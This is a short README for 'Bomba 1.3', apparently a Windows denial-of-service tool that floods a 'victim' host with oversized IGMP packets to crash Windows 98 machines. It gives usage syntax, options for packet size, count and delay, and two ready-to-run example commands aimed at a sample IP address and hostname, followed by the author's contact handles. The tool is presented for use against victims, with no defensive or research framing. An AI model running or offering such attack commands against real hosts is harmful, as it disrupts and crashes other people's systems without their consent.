
  Bomba Version 1.3
  =================

  This program sends oversized IGMP packets. This causes bluescreens,
  crashs on Windows 98 boxes.

  Note: This program only works with winsock2 and above.


  I. USAGE
  =================

  bomba.exe <victim> [options]

  Options:
    -s:    Extra data size (in bytes) (default 5)
    -n:    Num of packets to send     (0 is continuous (default))
    -d:    Delay (in ms)              (default 0)


  Example I: bomba 217.155.32.170

  On this attack:

  - Victim: 217.155.32.170
  - Extra data size: 5 bytes
  - Count: Continuous
  - Delay: 0 ms (no delay between packets)


  Example II: bomba www.ahost.com -n 10000 -d 100 -s 10

  On this attack:

  - Victim: www.ahost.com
  - Extra data size: 10 bytes
  - Count: 10000 times
  - Delay: 100 ms


  II. CONTACT
  =================
  MSN: metinsdr@hotmail.com
  UIN: 470734

